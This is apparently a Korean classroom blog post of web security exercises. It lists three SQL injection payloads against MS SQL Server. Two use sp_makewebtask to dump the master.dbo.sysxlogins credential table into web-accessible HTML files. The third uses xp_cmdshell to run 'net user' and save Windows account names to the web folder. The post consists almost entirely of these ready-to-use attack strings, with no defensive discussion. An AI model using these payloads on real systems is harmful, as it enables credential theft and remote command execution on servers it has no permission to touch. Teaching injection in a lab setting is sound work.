본문 바로가기

컴퓨터/웹 프로그래밍

web 080415

보너스예제) 홈디렉토리 찾으시오...
c:\비둘기

공격 예제1.
회원 정보를 mem학번.html 화일에 저장하시오.
admin'; exec sp_makewebtask 'c:\비둘기\dataroom\mem033.html','select * from master.dbo.sysxlogins'--


공격예제2.
sql 계정 정보를 sqlacc학번.html로 저장하시오.
admin'; exec sp_makewebtask 'c:\비둘기\dataroom\sqlacc033.htm',
'select name from master.dbo.sysxlogins'--

공격예제3.
윈도우 계정을 winuser학번.html로 저장하시오.
admin'; exec master.dbo.xp_cmdshell 'net user > c:\비둘기\winuser033.html'--